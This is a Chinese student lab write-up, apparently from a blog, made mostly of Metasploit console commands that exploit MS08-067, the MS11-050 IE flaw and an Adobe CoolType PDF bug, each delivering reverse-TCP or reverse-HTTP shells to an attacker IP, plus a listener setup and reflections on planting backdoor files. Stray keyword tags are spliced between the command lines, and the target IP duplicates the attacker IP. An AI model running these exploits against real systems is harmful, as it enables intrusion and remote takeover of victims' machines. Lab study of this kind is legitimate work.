在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
msf > use exploit/windows/smb/ms08_067_netapi
html
msf exploit(ms08_067_netapi) > show payloads
shell
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
windows
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip
api
msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口
浏览器
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定
安全
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
网络
msf exploit(ms08_067_netapi) > exploit //攻击
tcp
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
网站
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http //http反向回连
加密
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击
在kali上输入back退出当前模块,进入监听模块,输入如下命令:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向链接
msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(handler) > set LPORT 5213 //攻击端口固定
msf exploit(handler) > exploit
该模块使用发送TCP SYN标志的方式探测开放的端口。下面是我扫描到了个人靶机、
如何将后门文件安全传输或者了解靶机漏洞状况,这个是我认为距离实战有差距的地方。
此次的实验让我感受又距离实际操做进了一步,应用到了许多常见的漏洞。可是咱们仍是比较局限于msf的一些模块,并且把生成的文件图标啊弄到靶机上也比较难,因此期待下一次的实验能有新的突破。